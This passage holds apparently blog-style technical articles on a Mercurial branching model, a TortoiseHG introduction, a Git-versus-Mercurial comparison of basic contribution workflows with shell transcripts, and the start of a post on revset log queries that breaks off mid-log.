If you have special needs, this model can easily be extended to fulfill your requirements. Useful extensions include:

  • multiple releases - if you need to provide maintenance for multiple releases side-by-side.
  • grafted micro-releases - if you need to segment the next big changes into smaller releases while leaving out some potentially risky changes.
  • explicit review - if you want to ensure that only reviewed changes can get into a release, while making it possible to leave out some already reviewed changes from the next releases. Review gets decoupled from releasing.

All these extensions are orthogonal, so you can use them together without getting side-effects.

Multiple maintained releases

To use the branching model with multiple simultaneously maintained releases, you only need to change the hotfix procedure: When applying a hotfix, you go back to the old release with hg update tagname, fix there, add a new tag for the fixed release and then update to the next release. There you merge the new fix-release and do the same for all other releases. If the most recent release is not the head of the stable branch, you also merge into stable. Then you merge the stable branch into default, as for a normal hotfix.14

With this merge-chain you don’t need special branches for releases, but all changesets are still clearly recorded. This simplification over git is a direct result of having real anonymous branching in Mercurial.

hg update release-1.0
(edit)
hg ci -m "message"
hg tag release-1.1
hg update release-2.0
hg merge release-1.1
hg ci -m "merged changes from release 1.1"
hg tag release-2.1
… and so on

In the Diagram this just adds a merge path from the hotfix to the still maintained releases. Note that nothing changed in the workflow of programmers.

Overview Diagram
An overview of the branching strategy with maintained releases. Click the image to get the emacs org-mode ditaa-source.

Graft changes into micro-releases

If you need to test parts of the current development in small chunks, you can graft micro-releases. In that case, just update to stable, merge the first revision from default whose child you do not want, and graft later changes15.

Example for the first time you use micro-releases16:

You have changes 1, 2, 3, 4 and 5 on default. First you want to create a release which contains 1 and 4, but not 2, 3 or 5.

hg update 1
hg branch stable
hg graft 4

As usual tag the release and merge stable back into default:

hg tag rel-14 
hg update default
hg merge stable
hg commit -m "merge stable into default. ready for more development"

Example for the second and subsequent releases:

Now you want to release the changes 2 and 5, but you’re still not ready to release 3. So you merge 2 and graft 5.

hg update stable
hg merge 2
hg commit -m "merge all changes until 2 from default"
hg graft 5

As usual tag the release and finally merge stable back into default:

hg tag rel-1245 
hg update default
hg merge stable
hg commit -m "merge stable into default. ready for more development"

The history now looks like this17:

@    merge stable into default. ready for more development (default)
|\
| o  Added tag rel-1245 for changeset 4e889731c6ca (stable)
| |
| o  5 (stable)
| |
| o    merge all changes until 2 from default (stable)
| |\
o---+  merge stable into default. ready for more development (default)
| | |
| | o  Added tag rel-14 for changeset cc2c95dd3f27 (stable)
| | |
| | o  4 (stable)
| | |
o | |  5 (default)
| | |
o | |  4 (default)
| | |
o | |  3 (default)
|/ /
o /  2 (default)
|/
o  1 (default)
|
o  0 (default)

In the Diagram this just adds graft commits to stable:

Overview Diagram
An overview of the branching strategy with grafted micro-releases. Click the image to get the emacs org-mode ditaa-source.

Grafted micro-releases add another layer between development and releases. They can be necessary in cases where testing requires actually deploying a release, as for example in Freenet.

Explicit review branch

If you want to add a separate review stage, you can use a review branch1819 into which you only merge or graft reviewed changes. The review branch then acts as a staging area for all changes which might go into a release.

To use this extension of the branching model, just create a branch on default called review in which you merge or graft reviewed changes. The first time you do that, you update to the first commit whose children you do not want to include. Then create the review branch with hg branch review and use hg graft REV to pull in all changes you want to include.

On subsequent reviews, you just update to the review branch with hg update review, merge the first revision which has a child you do not want with hg merge REV and graft additional later changes with hg graft REV, as you would do for micro-releases.

In both cases you create the release by merging the review branch into stable.
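
Put together, a review round could look like this (a sketch; the revision numbers and the tag name are placeholders for your actual reviewed changes):

hg update 41          # first time only: the first commit whose children you do not want to include
hg branch review      # first time only: create the review branch
hg graft 43           # graft each reviewed change
hg graft 45
hg update stable      # release the reviewed state
hg merge review
hg ci -m "merged reviewed changes for release"
hg tag v3
# then merge stable back into default as usual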

A special condition when using a review branch is that you always have to merge hotfixes into the review branch, too, because the review branch does not automatically contain all changes from the default branch.
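
In practice that is one extra merge after the usual hotfix steps (sketch):

hg update review
hg merge stable       # bring the hotfix that was just committed on stable into review
hg ci -m "merged hotfix into review"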

In the Diagram this just adds the review branch between default and stable instead of the release merge. Also it adds the hotfix merge to the review branch.

Overview Diagram
An overview of the branching strategy with a review branch. Click the image to get the emacs org-mode ditaa-source.

Frequently Asked Questions (FAQ)

Where does QA (Quality Assurance) come in?

In the default flow, where users directly use the stable branch, you do QA on the default branch before merging to stable. QA is part of the maintainer’s job there.

If your users want external QA, that QA is done for revisions on the stable branch. It is restricted to signing good revisions. Any changes have to be done on the default branch - except for hotfixes for previously signed releases. It is only a hotfix if your users could already be running a broken version.
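
One way such external QA could look (a sketch, assuming the reviewers use the gpg extension mentioned in the footnote on signing):

hg update stable      # check out the revision to verify
# (run the test suite, audits, whatever your QA requires)
hg sign               # sign the good revision on stable
hg update default
hg merge stable
hg ci -m "merged stable into default: ready for more development"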

There is also an extension with an explicit review branch. There QA is done on the review branch.

Simple Summary

This realizes the successful Git branching model with Mercurial.

We now have nice graphs, examples, potential extensions and so on. But since this strategy uses Mercurial instead of git, we don’t actually need all the graphics, descriptions and branch categories in the git version - or in this post.

Instead we can boil all of this down to 3 simple rules:

(1) you do all the work on default - except for hotfixes.

(2) on stable you only do hotfixes, merges for release and tagging for release. Only maintainers touch stable.

(3) you can use arbitrary feature-branches, as long as you don’t call them default or stable. They always start at default (since you do all the work on default).

They are the rules you already know from the starting summary. Keep them in mind and you’re good to go. And when you’re doing regular development, there is only one rule to remember:

You do all the work on default.

That’s it. Happy hacking!


  1. if you need to maintain multiple very different releases simultaneously, see the section on multiple maintained releases or footnote 20 for adaptions 

  2. default is the default branch. That’s the named branch you use when you don’t explicitly set a branch. Its alias is the empty string, so if no branch is shown in the log (hg log), you’re on the default branch. Thanks to John for asking! 

  3. If you want to release the changes from default in smaller chunks, you can also graft specific changes into a release preparation branch and merge that instead of directly merging default into stable. This can be useful to get real-life testing of the distinct parts. For details see the extension Graft changes into micro-releases

  4. Maintainers are those who do releases, while they do a release. At any other time, they follow the same patterns as everyone else. If the release tasks seem a bit long, keep in mind that you only need them when you do the release. Their goal is to make regular development as easy as possible, so you can tell your non-releasing colleagues “just work on default and everything will be fine”. 

  5. This model does not use bookmarks, because they don’t offer benefits which outweigh the cost of introducing another concept: If you use bookmarks for differentiating lines of development, you have to define the canonical revision to clone by setting the @ bookmark. For local work and small features, bookmarks can be used quite well, though, and since this model does not define their use, it also does not limit it.
    Additionally bookmarks could be useful for feature branches, if you use many of them (in that case reusing names is a real danger and not just a rare annoyance) or if you use release branches:
    “What are people working on right now?” → hg bookmarks
    “Which lines of development do we have in the project?” → hg branches 

  6. Those users who want external verification can restrict themselves to the tagged releases - potentially GPG signed by trusted 3rd-party reviewers. GPG signatures are treated like hotfixes: reviewers sign on stable (via hg sign without options) and merge into default. Signing directly on stable reduces the possibility of signing the wrong revision. 

  7. hg pull and hg push to transfer changes and hg merge when you have multiple heads on one branch are implied in the actions: you can use any kind of repository structure and synchronization scheme. The practical actions only assume that you synchronize your repositories with the other contributors at some point. 

  8. Here a hotfix is defined as a fix which must be applied quickly out-of-order, for example to fix a security hole. It prompts a bugfix-release which only contains already stable and tested changes plus the hotfix. 

  9. If your project needs a certain release preparation phase (like translations), then you can simply assign a task branch. Instead of merging to stable, you merge to the task branch, and once the task is done, you merge the task branch to stable. An Example: Assume that you need to update translations before you release anything. (next part: init: you only need this once) When you want to do the first release which needs to be translated, you update to the revision from which you want to make the release and create the “translation” branch: hg update default; hg branch translation; hg commit -m "prepared the translation branch". All translators now update to the translation branch and do the translations. Then you merge it into stable: hg update stable; hg merge translation; hg ci -m "merged translated source for release". After the release you merge stable back into default as usual. (regular releases) If you want to start translating the next time, you just merge the revision to release into the translation branch: hg update translation; hg merge default; hg commit -m "prepared translation branch". Afterwards you merge “translation” into stable and proceed as usual. 

  10. To run the example and check the output yourself, just copy-paste the following your shell: LC_ALL=C sh -c 'hg init test-branch; cd test-branch; echo 1 > 1; hg ci -Am 1; hg branch stable; hg tag v1 ; hg up default; hg merge stable; hg ci -m "merged stable into default: ready for more development"; echo 2 > 2; hg ci -Am 2; hg up stable; echo 1.1 > 1; hg ci -Am hotfix; hg up default; hg merge stable; hg ci -m "merge stable into default: ready for more development"; hg up stable; hg merge default; hg ci -m "merge default into stable for release" ; hg tag v2; hg up default ; hg merge stable ; hg ci -m "merged stable into default: ready for more development" ; hg branch feature-x; echo x > x ; hg ci -Am x; hg up default; echo 3 > 3; hg ci -Am 3; hg merge feature-x; hg ci -m "merged feature x into default"; hg update feature-x; hg ci --close-branch -m "finished feature x"; hg update default; hg merge feature-x; hg ci -m "merged finished feature x into default"; hg up stable ; hg merge default; hg ci -m "merged default into stable for release"; hg up default; hg merge stable ; hg ci -m "merged stable into default: ready for more development"; hg log -G' 

  11. We merge the hotfix into default to define the relevance of the fix for general development. If the hotfix also affects the current line of development, we keep its changes in the merge. If the current line of development does not need the hotfix, we discard its changes in the merge. We do this to ensure that it is clear in future how to treat the hotfix when merging new changes: let the merge record the decision. 

  12. We can also merge to stable regularly as soon as some set of changes is considered stable, but without making an actual release (==tagging). That way we always have a stable branch which people can test without having to create releases right away. The releases are those changesets on the stable branch which carry a tag. 

  13. If you look at the Git branching model which inspired this Mercurial branching model, you’ll note that its diagram is a lot more complex than the diagram of this Mercurial version.

    The reason for that is the more expressive history model of Mercurial. In short: The git version has 5 types of branches: feature, develop, release, hotfix and master (for tagging). With Mercurial you can reduce them to 3: default, stable and feature branches:

    • Tags are simple in-history objects, so we need no special branch for them: a tag signifies a release (down to 4 branch-types - and no more duplication of information, since in the git-model a release is shown by a tag and a merge to master).
    • Hotfixes are simple commits on stable followed by a merge to default, so we also need no branch for them (down to 3 branch-types). And if we only maintain one release at a time, we only need one branch for them: stable (down from branch-type to single branch).
    • And feature branches are not required for clean separation since mercurial can easily cope with multiple heads in a branch, so developers only have to worry about them if they want to use them (down to 2 mandatory branches).
    • And since the default branch is the branch to which you update automatically when you clone a repository, new developers don’t have to worry about branches at all.

    So we get down from 5 mandatory branches (2 of them are categories containing multiple branches) to 2 simple branches without losing functionality.

    And new developers only need to know two things about our branching model to contribute:

    “If you use feature branches, don’t call them default or stable. And don’t touch stable”.

  14. Merging old releases into new ones sounds like a lot of work. If you get that feeling, then have a look at how many releases you really maintain right now. In my Gentoo tree most programs actually have only one single release, so using actual release branches would incur an additional burden without adding real value. You can also look at the rule of thumb on whether to choose release branches instead. 

  15. If you want to make sure that every changeset on stable is production-ready, you can also start a new release-branch on stable, then merge the first revision, whose child you do not want, into that branch and graft additional changes. Then close the branch and merge it into stable. You can achieve the same with much lower overhead (unneeded complexity) by changing the requirement to “every tagged revision on stable is production-ready”. To only see tagged revisions on stable, just use hg log -r "branch(stable) and tag()". This also works for incoming and outgoing, so you can use it for triggering a build system. 

  16. To test this workflow yourself, just create the test repository with hg init 12345; cd 12345; for i in {0..5}; do echo $i > $i; hg ci -Am $i; done

  17. The short graphlog for the grafted micro-releases was created via hg glog --template "{desc} ({branch})"

  18. The review branch is a special preparation-branch, because it can get discontinuous changes if maintainers decide to graft some changes which have ancestors they did not review yet. 

  19. We use one single review branch which gets reused at every review to ensure that there are no changes in stable which we did not have in the review. As alternative, you could use one branch per review. In that case, ensure that you start the review-* branches from stable and not from default. Then merge and graft the changes from default which you want to review for inclusion in your next release. 

  20. If you want to adapt the model to multiple very distinct releases, simply add multiple release-branches (e.g. release-x). Then hg graft the changes you want to use from default or stable into the releases and merge the releases into stable to ensure that the relationship of their changes to current changes is clear, recorded and will be applied automatically by Mercurial in future merges21. If you use multiple tagged releases, you need to merge the releases into each other in order - starting from the oldest and finishing by merging the most recent one into stable - to record the same information as with release branches. Additionally it is considered impolite to other developers to keep multiple heads in one branch, because with multiple heads other developers do not know the canonical tip of the branch which they should use to make their changes - or in the case of stable, which head they should merge to for preparing the next release. That’s why you are likely better off creating a branch per release, if you want to maintain many very different releases for a long time. If you only use tags on stable for releases, you need one merge per maintained release to create a bugfix version of one old release. By adding release branches, you reduce that overhead to one single merge to stable per affected release by stating clearly that changes to old versions should never affect new versions, except if those changes are explicitly merged into the new versions. If the bugfix affects all releases, release branches require two times as many actions as tagged releases, though: You need to graft the bugfix into every release and merge the release into stable.22 

  21. If for example you want to ignore that change to an old release for new releases, you simply merge the old release into stable and use hg revert --all -r stable before committing the merge. 

  22. A rule of thumb for deciding between tagged releases and release branches is: If you only have a few releases you maintain at the same time, use tagged releases. If you expect that most bugfixes will apply to all releases, starting with some old release, just use tagged releases. If bugfixes will only apply to one release and the current development, use tagged releases and merge hotfixes only to stable. If most bugfixes will only apply to one release and not to the current development, use release branches. 

Attachment (size):
  • hgbranchingoverview.png (28.75 KB)
  • hgbranchinggraft.png (29.36 KB)
  • hgbranchingreview.png (35.6 KB)
  • 2012-09-03-Mo-hg-branching-diagrams.org (12.43 KB)
  • hgbranchingmaintain.png (45.08 KB)
  • 2012-09-03-Mo-hg-branching-diagrams.org (10.74 KB)

A short introduction to Mercurial with TortoiseHG (GNU/Linux and Windows)

Note: This tutorial is for the old TortoiseHG (with gtk interface). The new one works a bit differently (and uses Qt). See the official quick start guide. The right-click menus should still work similarly to the ones described here, though.

Downloading the Repository

After installing TortoiseHG, you can download a repository to your computer by right-clicking in a folder and selecting the menu "TortoiseHG" and then "Clone" in there (currently you still need Windows for that - all other dialogs can be invoked in GNU/Linux on the commandline via "hgtk").

Right-Click menu, Windows:

Right-click-Menu

Create Clone, GNU/Linux:

Create Clone

In the dialog you just enter the url of the repository, for example:

http://www.bitbucket.org/ArneBab/md-esw-2009

(that's also the address of the repository on the internet - just try clicking the link.)

When you log in to bitbucket.org you will find a clone-address directly on the site. You can also use that clone address to upload changes (it contains your login-name, and I can give you "push" access on that site).

Workflow with TortoiseHG

This gives you two basic abilities:

  • Save and view changes locally, and
  • synchronize changes with others.

(I assume that part of what I say is redundant, but I'd rather write a bit too much than omit a crucial bit)

To save changes, you can simply select "HG Commit" in the right-click-menu. If some of your files aren't known to HG yet (the box before the file isn't ticked), you have to add them (tick the box) to be able to commit them.

Commit

To go back to earlier changes, you can use "Checkout Revision" in the "TortoiseHG" menu. In that dialog you can then select the revision you want to see and use the icon on the upper left to get all files to that revision.

Update

Update-Result

You can synchronize by right-clicking in the folder and selecting "Synchronize" in the "TortoiseHG" menu (inside the right-click menu). In the opening dialog you can "push" (upload changes - arrow up with the bar above it), "pull" (download changes to your computer - arrow down with bar below), and check what you would pull or push (arrows without bars). I think that using this dialog will soon become second nature for you, too :)

Synchronize

Pull

Have fun with TortoiseHG! :) - Arne

PS: There's also a longer intro to TortoiseHG and an overview to DVCS.

PPS: md-esw-2009 is a repository in which Baddok and I planned a dual-GM roleplaying session of Mechanical Dream.

PPPS: There's also a german version of this article on my german pages.

Basic usecases for DVCS: Workflow Failures

If you came here searching for a way to set the username in Mercurial: just run hg config --edit and add
    [ui]
    username = YOURNAME <EMAIL>
to the file which gets opened. If you have a very old version of Mercurial (<3.0), open $HOME/.hgrc manually.

Update (2015-02-05): For the Git breakage there is now a partial solution in Git v2.3.0: You can push into a checked out branch when you prepare the target repo via git config receive.denyCurrentBranch updateInstead, but only if nothing was changed there. This does not fully address the workflow breakage (the success of the operation is still state-dependent), but at least it makes it work. With Git providing a partial solution for the breakage I reported and Mercurial providing a full solution since 2014-05-01, I call this blog post a success. Thank you Git and Mercurial devs!
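
For a Git at or above v2.3.0 that preparation step would look roughly like this (a sketch, using the repository names from the example below):

cd /tmp/gitflow/mine
git config receive.denyCurrentBranch updateInstead
# now a plain "git push" from the test clone updates mine - as long as mine has no local edits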

Update (2014-05-01): The Mercurial breakage is fixed in Mercurial 3.0: When you commit without username it now says “Abort: no username supplied (use "hg config --edit" to set your username)”. The editor shows a template with a commented-out field for the username. Just put your name and email after the pre-filled username = and save the file. The Git breakage still exists.

Update (2013-04-18): In #mercurial @ irc.freenode.net there were discussions yesterday for improving the help output if you do not have your username setup, yet.

1 Intro

I recently tried contributing to a new project again, and I was quite surprised by the hurdles that can be in your way when you have not set up your environment yet.

So I decided to put together a small test for the basic workflow: Cloning a project, doing and testing a change and pushing it back.

I did that for Git and Mercurial, because both break at different points.

I’ll express the basic usecase in Subversion:

  • svn checkout [project]
  • (hack, test, repeat)
  • (request commit rights)
  • svn commit -m "added X"

You can also replace the request for commit rights with creating a patch and sending it to a mailing list. But let’s take the easiest case of a new contributor who is directly welcomed into the project as trusted committer.

dvcs-basic-svn.png

A slightly more advanced workflow adds testing in a clean tree. In Subversion it looks almost like the simple commit:

dvcs-basic-svn-testing.png

2 Git

Let’s start with Linus’ DVCS. And since we’re using a DVCS, let’s also try it out in real life.

2.1 Setup the test

LC_ALL=C
LANG=C
PS1="$"
rm -rf /tmp/gitflow > /dev/null
mkdir -p /tmp/gitflow > /dev/null
cd /tmp/gitflow > /dev/null
# init the repo
git init orig  > /dev/null
cd orig > /dev/null
echo 1 > 1
# add a commit
git add 1 > /dev/null
git config user.name upstream > /dev/null
git config user.email up@stream > /dev/null
git commit -m 1 > /dev/null
# checkout another branch but master. YES, YOU SHOULD DO THAT on the shared repo. We’ll see later, why.
git checkout -b never-pull-this-temporary-useless-branch master 2> /dev/null
cd .. > /dev/null
echo # purely cosmetic and implementation detail: this adds a new line to the output
ls
orig
git --version

git version 1.8.1.5

2.2 Simplest case

2.2.1 Get the repo

First I get the repo

git clone orig mine
echo $ ls
ls
Cloning into 'mine'...
done.
$ ls
mine  orig

2.2.2 Hack a bit

cd mine
echo 2 > 1
git commit -m "hack"

$# On branch master
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)

modified:   1
no changes added to commit (use "git add" and/or "git commit -a")

ARGL… but let’s paste the commands into the shell. I do not use --global, since I do not want to shoot my test environment here.

git config user.name "contributor"
git config user.email "con@tribut.or"

and try again

git commit -m "hack"

On branch master
Changes not staged for commit:
(use "git add <file>..." to update what will be committed)
(use "git checkout -- <file>..." to discard changes in working directory)

modified:   1
no changes added to commit (use "git add" and/or "git commit -a")

ARGL… well, paste it in again…

git add 1
git commit -m "hack"

[master aba911a] hack
 1 file changed, 1 insertion(+), 1 deletion(-)

Finally I managed to commit my file. Now, let’s push it back.

2.2.3 Push it back

git push
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 222 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
To /tmp/gitflow/orig
master

HA! It’s in.

2.2.4 Overview

In short the required commands look like this:

  • git clone orig mine
  • cd mine; (hack)
  • git config user.name "contributor"
  • git config user.email "con@tribut.or"
  • git add 1
  • git commit -m "hack"
  • (request permission to push)
  • git push

dvcs-basic-git.png

compare Subversion:

./dvcs-basic-svn.png

Now let’s see what that initial setup with setting a non-master branch was about…

2.3 With testing

2.3.1 Test something

I want to test a change and ensure that it works with a fresh clone. So I just clone my local repo and commit there.

cd ..
git clone mine test
cd test
# setup the user locally again. Normally you do not need that again, since you’d use --global.
git config user.name "contributor" 
git config user.email "con@tribut.or"
# hack and commit
echo test > 1
git add 1
echo # cosmetic
git commit -m "change to test" >/dev/null
# (run the tests)

2.3.2 Push it back

git push
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 234 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: error: refusing to update checked out branch: refs/heads/master        
remote: error: By default, updating the current branch in a non-bare repository        
remote: error: is denied, because it will make the index and work tree inconsistent        
remote: error: with what you pushed, and will require 'git reset --hard' to match        
remote: error: the work tree to HEAD.        
remote: error:         
remote: error: You can set 'receive.denyCurrentBranch' configuration variable to        
remote: error: 'ignore' or 'warn' in the remote repository to allow pushing into        
remote: error: its current branch; however, this is not recommended unless you        
remote: error: arranged to update its work tree to match what you pushed in some        
remote: error: other way.        
remote: error:         
remote: error: To squelch this message and still keep the default behaviour, set        
remote: error: 'receive.denyCurrentBranch' configuration variable to 'refuse'.        
To /tmp/gitflow/mine
master (branch is currently checked out)
error: failed to push some refs to '/tmp/gitflow/mine'

Uh… what? If I were a real first time user, at this point I would just send a patch…

The simple local test clone does not work: You actually have to also check out a different branch if you want to be able to push back (needless duplication of information - and effort). And it actually breaks this simple workflow.

(experienced git users will now tell me that you should always check out a work branch. But that would mean that I would have to add the additional branching step to the simplest case without a testing repo, too, raising the bar for contribution even higher)

git checkout -b testing master
git push ../mine testing
Switched to a new branch 'testing'
Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)
Writing objects: 100% (3/3)
Writing objects: 100% (3/3), 234 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
To ../mine
   testing

Since I only pushed to mine, I now have to go there, merge and push.

cd ../mine
git merge testing
git push
Updating aba911a..820dea8
Fast-forward
 1 | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
warning: push.default is unset; its implicit value is changing in
Git 2.0 from 'matching' to 'simple'. To squelch this message
and maintain the current behavior after the default changes, use:

  git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

  git config --global push.default simple

See 'git help config' and search for 'push.default' for further information.
(the 'simple' mode was introduced in Git 1.7.11. Use the similar mode
'current' instead of 'simple' if you sometimes use older versions of Git)

Counting objects: 5, done.
(1/3)   
Writing objects:  66% (2/3)   
Writing objects: 100% (3/3)   
Writing objects: 100% (3/3), 234 bytes, done.
Total 3 (delta 0), reused 0 (delta 0)
To /tmp/gitflow/orig
master

2.3.3 Overview

In short the required commands for testing look like this:

  • git clone mine test
  • cd test; (hack)
  • git add 1
  • git checkout -b testing master
  • git commit -m "hack"
  • git push ../mine testing
  • cd ../mine
  • git merge testing
  • git push

./dvcs-basic-git-testing.png

Compare to Subversion

./dvcs-basic-svn-testing.png

2.4 Wrapup

The git workflows broke at several places:

Simplest:

  • Set the username (minor: it’s just pasting shell commands)
  • Add every change (==staging. Minor: paste shell commands again - or use `commit -a`)

Testing clone (only additional breakages):

  • Cannot push to the local clone (major: it spews about 20 lines of error messages which do not tell me how to actually get my changes into the local clone)
  • Have to use a temporary branch in a local clone to be able to push back (annoyance: makes using clean local clones really annoying).
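
For completeness: the roughly 20 lines of error output do contain a way out, buried and explicitly discouraged. In the receiving clone you could allow pushing into the checked out branch and then sync its work tree by hand. A sketch based on the hints in the error message above (not recommended for anything but throwaway test clones):

cd ../mine
git config receive.denyCurrentBranch ignore
# after a push from the test clone, the work tree in mine still has to be updated by hand:
git reset --hard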

3 Mercurial

Now let’s try the same with Mercurial.

3.1 Setup the test

LC_ALL=C
LANG=C
PS1="$"
rm -rf /tmp/hgflow > /dev/null
mkdir -p /tmp/hgflow > /dev/null
cd /tmp/hgflow > /dev/null
# init the repo
hg init orig  > /dev/null
cd orig > /dev/null
echo 1 > 1 > /dev/null
# add a commit
hg add 1 > /dev/null
hg commit -u upstream -m 1 > /dev/null
cd .. >/dev/null
echo # purely cosmetic and implementation detail: this adds a new line to the output
ls
orig
hg --version

Mercurial Distributed SCM (version 2.5.2)
(see https://mercurial-scm.org for more information)

Copyright (C) 2005-2012 Matt Mackall and others
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

3.2 Simplest case

3.2.1 Get the repo

hg clone orig mine
echo $ ls
ls
updating to branch default
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ ls
mine  orig

3.2.2 Hack a bit

cd mine
echo 2 > 1
echo
# I disable the username to show the problem
hg --config ui.username= commit -m "hack" 

abort: no username supplied (see "hg help config")

ARGL, what??? Mind the update at the top of this article: This is fixed in Mercurial 3.0

Well, let’s do what it says (but only see the first 30 lines to avoid blowing up this example):

hg help config | head -n 30 | grep -B 3 -A 1 per-repository
These files do not exist by default and you will have to create the
    appropriate configuration files yourself: global configuration like the
    username setting is typically put into "%USERPROFILE%\mercurial.ini" or
    "$HOME/.hgrc" and local configuration is put into the per-repository
    "<repo>/.hg/hgrc" file.

Are you serious??? I have to actually read a guide just to commit my change??? As a normal user this would tip my frustration with the tool over the edge and likely get me to just send a patch… Mind the update at the top of this article: This is fixed in Mercurial 3.0

But I am no normal user, since I want to write this guide. So I assume a really patient user, who does the following (after reading for 3 minutes):

echo '[ui]
username = "contributor"' >> .hg/hgrc

and tries again:

hg commit -m "hack"

Now it worked. But this is MAJOR BREAKAGE. Mind the update at the top of this article: This is fixed in Mercurial 3.0

3.2.3 Push it back

hg push
pushing to /tmp/hgflow/orig
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

Done. This was easy, and I did not get yelled at (different from the experience with git :) ).

3.2.4 Overview

In short the required commands look like this:

  • hg clone orig mine
  • cd mine; (hack)
  • hg help config ; (read) ; echo '[ui]
    username = "contributor"' >> .hg/hgrc (are you serious?)

  • hg commit -m "hack"
  • (request permission to push)
  • hg push

./dvcs-basic-hg.png

Compare to Subversion

./dvcs-basic-svn.png

and to git

./dvcs-basic-git.png

3.3 With testing

3.3.1 Test something

cd ..
hg clone mine test
cd test
# setup the user locally again. Normally you do not need that again, since you’d use --global.
echo '[ui]
username = "contributor"' >> .hg/hgrc
# hack and commit
echo test > 1
echo # cosmetic
hg commit -m "change to test"
# (run the tests)

updating to branch default
1 files updated, 0 files merged, 0 files removed, 0 files unresolved

3.3.2 Push it back

hg push
pushing to /tmp/hgflow/mine
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

It’s in mine now, but I still need to push it from there.

cd ../mine
hg push

pushing to /tmp/hgflow/orig
searching for changes
adding changesets
adding manifests
adding file changes
added 1 changesets with 1 changes to 1 files

Done.

If I had worked on mine in the meantime, I would have to merge there, too - just as with git, except that I would not have to give a branch name. But since we’re in the simplest case, we don’t need to do that.
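
In that case the additional steps in mine would look roughly like this (a sketch, analogous to the git version above):

hg merge
hg commit -m "merge"
hg push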

3.3.3 Overview

In short the required commands for testing look like this:

  • hg clone mine test
  • cd test; (hack)
  • hg commit -m "hack"
  • hg push ../mine
  • cd ../mine
  • hg push

./dvcs-basic-hg-testing.png

Compare to Subversion

./dvcs-basic-svn-testing.png

and to git

./dvcs-basic-git-testing.png

3.4 Wrapup

The Mercurial workflow broke only ONCE, but there it broke HARD: To commit you actually have to READ THE HELP PAGE on config to find out how to set your username.

So, to wrap it up: ARE YOU SERIOUS? Mind the update at the top of this article: This is fixed in Mercurial 3.0

That’s a really nice workflow, disturbed by a devastating user experience for just one of the commands.

This is a place where hg should learn from git: The initial setup must be possible from the commandline, without reading a help page and without changing to an editor and then back into the commandline.
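
For comparison, the git side of this is a single shell command per setting, as used above:

git config --global user.name "contributor"
git config --global user.email "con@tribut.or"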

4 Summary

  • Git broke at several places, and in one place it broke hard: Pushing between local clones is a huge hassle, even though that should be a strong point of DVCSs.
  • Mercurial broke only once, but there it broke hard: Setting the username actually requires reading help output and hand-editing a text file.

Also the workflows for a user who gets permission to push always required some additional steps compared to Subversion.

One of the additional steps cannot be avoided without losing offline-commits (which are a major strength of DVCS), because those make it necessary to split svn commit into commit and push: That separates storing changes from sharing them.

But git actually requires additional steps which are only necessary due to implementation details of its storage layer: Pushing to a repo with the same branch checked out is not allowed, so you have to create an additional branch in your local clone and merge it in the other repo, even if all your changes simply build on top of the changes in the other repository, and it requires either a flag on every commit command or explicit adding of changes. That amounts not just to the one unavoidable additional command, but to three further commands, so the number of commands to get code, hack on it and share it increases from 5 to 9. And if you work in a team where people trust you to write good code, that does not actually reduce the required effort to share your changes.

On the other hand, both Mercurial and Git allow you to work offline, and you can do as many testing steps in between as you like, without needing to get the changes from the server every time (because you can simply clone a local repo for that).

4.1 Visually

4.1.1 Subversion

./dvcs-basic-svn-testing.png

4.1.2 Mercurial

./dvcs-basic-hg-testing.png

4.1.3 Git

./dvcs-basic-git-testing.png

Date: 2013-04-17T20:39+0200

Author: Arne Babenhauserheide

Org version 7.9.2 with Emacs version 24

Attachments:
  dvcs-basic-svn.png (2.53 KB)
  dvcs-basic-svn-testing.png (2.68 KB)
  dvcs-basic-hg.png (2.72 KB)
  dvcs-basic-hg-testing.png (3.08 KB)
  dvcs-basic-git.png (2.89 KB)
  dvcs-basic-git-testing.png (3.95 KB)
  2013-04-17-Mi-basic-usecase-dvcs.org (13.02 KB)
  2013-04-17-Mi-basic-usecase-dvcs.pdf (274.67 KB)

Creating nice logs with revsets in Mercurial

In the mercurial list Stanimir Stamenkov asked how to get rid of intermediate merges in the log to simplify reading the history (and to not care about missing some of the details).

Update: Since Mercurial 2.4 you can simply use
hg log -Gr "branchpoint()"

I did some tests for that and I think the nicest representation I found is this:

hg log -Gr "(all() - merge()) or head()"

This article shows examples for this. To find more revset options, run hg help revsets.

The result

It showed that in the end the revisions converged again - and it shows the actual states of the development.

$ hg log -Gr "(all() - merge()) or head()"

@    changeset:   7:52fe4a8ec3cc
|\   tag:         tip
| |  parent:      6:7d3026216270
| |  parent:      5:848c390645ac
| |  user:        Arne Babenhauserheide <bab@draketo.de>
| |  date:        Tue Aug 14 15:09:54 2012 +0200
| |  summary:     merge
| |
| \
| |\
| | o  changeset:   3:55ba56aa8299
| | |  parent:      0:385d95ab1fea
| | |  user:        Arne Babenhauserheide <bab@draketo.de>
| | |  date:        Tue Aug 14 15:09:40 2012 +0200
| | |  summary:     4
| | |
